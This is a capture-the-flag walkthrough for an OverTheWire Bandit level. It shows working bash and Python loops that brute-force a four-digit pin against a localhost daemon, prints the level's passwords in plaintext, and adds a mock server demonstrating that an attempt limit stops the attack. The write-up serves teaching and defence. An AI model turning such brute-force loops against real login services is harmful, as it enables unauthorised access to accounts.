Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode.
Solution
As the goal states, we will need to brute force the pincode in order to retrieve the next password. The ncat tool wasn’t returning the server’s output when the input was piped in, so we can use the other netcat utility on the system, nc. When we pipe in the bandit24 password and a four-digit pin we get a welcome message followed by a message telling us whether the pin was correct. Note the -w flag tells nc to wait one second so we get the full response.
$ echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0000 | nc -w 1 127.0.0.1 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
$
Iterating through the pincodes manually would be very time consuming so we will write a script to speed things up. The bash script is as follows:
#!/bin/bash
# Try every four-digit pin over a fresh connection and stop at the first reply that is not "Wrong".
for i in {0000..9999}; do
    echo "Trying $i ..."
    res="$(echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i | nc -w 1 127.0.0.1 30002)"
    if ! echo "$res" | grep -o "Wrong"; then
        echo "$res"
        exit
    fi
done
The script iterates through the range of numbers 0000 to 9999 and sends each one to the server listening on port 30002 along with bandit24’s password. The response is then piped through grep to check if it contains the string “Wrong”. The “!” is a negation, so if the string “Wrong” is not in the response, then the full response is printed and the script exits.
$ ./brute.sh
Trying 0000 ...
Wrong
Trying 0001 ...
Wrong
...
Trying 1025 ...
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
$
This script works, but the one-second wait on every connection inflates the runtime. We can write a Python script to speed things up.
#!/usr/bin/env python3
import socket

HOST = "127.0.0.1"
PORT = 30002
passwd = "VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar"

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    # Connect once and read the welcome banner
    s.connect((HOST, PORT))
    welcome = s.recv(1024)
    print(welcome.decode())

    # Brute force the pin over the same connection
    for i in range(10000):
        print("Trying %04d ..." % i)
        p = "%s %04d\n" % (passwd, i)
        s.sendall(p.encode())
        data = s.recv(1024)
        if "Wrong" not in data.decode():
            print(data.decode())
            break
This script creates a socket object and connects to port 30002 on localhost. It then receives and prints the welcome message from the server. Next, it iterates through the integers 0 to 9999, builds a string containing bandit24’s password and the current integer zero-padded to four digits (%04d), and sends this string to the server. If the string “Wrong” is not in the response received, the response is printed and the script exits.
$ ./brute.py
Trying 0000 ...
Trying 0001 ...
...
Trying 1025 ...
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
Exiting.
$
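To see both why the single-connection loop is fast and what would stop it, here is an added example that is not part of this writeup or of the OverTheWire daemon. It runs a constructed stand-in for the pincode checker on an ephemeral localhost port (constructed password and pin, same one-line "password pin" protocol as the level description) and points the page's brute-force approach at it twice: once with unlimited attempts, where the loop succeeds, and once with a per-connection attempt cap, the mitigation that ends the run after a handful of guesses.

```python
#!/usr/bin/env python3
"""Mock pincode checker plus the single-connection brute-force loop from the writeup.

Added example, not the writeup's or OverTheWire's code. PASSWORD and SECRET_PIN are
constructed values; the server binds an ephemeral port on 127.0.0.1, so nothing here
talks to the real level.
"""
import socket
import threading

PASSWORD = "constructed-bandit24-password"  # constructed, not the level password
SECRET_PIN = "1025"                          # constructed stand-in for the daemon's pin
MAX_ATTEMPTS = 5                             # lockout threshold for the hardened variant

WELCOME = (b"I am the pincode checker for user bandit25. Please enter the password "
           b"for user bandit24 and the secret pincode on a single line, separated by a space.\n")


def serve_one(conn, max_attempts):
    """Handle one client. max_attempts=None reproduces the unlimited behaviour the
    writeup relies on; an integer closes the connection after that many wrong guesses."""
    with conn, conn.makefile("rb") as rf:
        conn.sendall(WELCOME)
        wrong = 0
        for line in rf:
            parts = line.decode(errors="replace").split()
            if len(parts) == 2 and parts[0] == PASSWORD and parts[1] == SECRET_PIN:
                conn.sendall(b"Correct!\nThe password of user bandit25 is <placeholder>\nExiting.\n")
                return
            wrong += 1
            if max_attempts is not None and wrong >= max_attempts:
                conn.sendall(b"Too many wrong attempts, closing connection.\n")
                return
            conn.sendall(b"Wrong! Please enter the correct pincode. Try again.\n")


def start_server(max_attempts=None):
    """Bind an ephemeral localhost port, serve clients on daemon threads, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=serve_one, args=(conn, max_attempts), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def brute_force(port, password):
    """The writeup's approach: one TCP connection, pins 0000..9999 in sequence.
    Returns (pin, attempts) on success, or (None, attempts) when the server stops
    answering "Wrong" without saying "Correct" (lockout or hang-up)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect(("127.0.0.1", port))
        rf = s.makefile("rb")
        rf.readline()  # welcome banner, read once per connection
        for i in range(10000):
            s.sendall(f"{password} {i:04d}\n".encode())
            reply = rf.readline()
            if reply.startswith(b"Correct"):
                return f"{i:04d}", i + 1
            if not reply.startswith(b"Wrong"):  # empty reply or lockout notice
                return None, i + 1
    return None, 10000


if __name__ == "__main__":
    for label, limit in (("unlimited attempts", None), (f"max {MAX_ATTEMPTS} attempts", MAX_ATTEMPTS)):
        port = start_server(limit)
        print(f"{label}: {brute_force(port, PASSWORD)}")
```

Against the unlimited server the loop recovers the constructed pin on the 1026th guess, mirroring the writeup's run; against the capped server the connection is cut after five wrong answers, which is the check a pincode daemon of this kind would need so that keeping one socket open cannot be used to walk the whole keyspace.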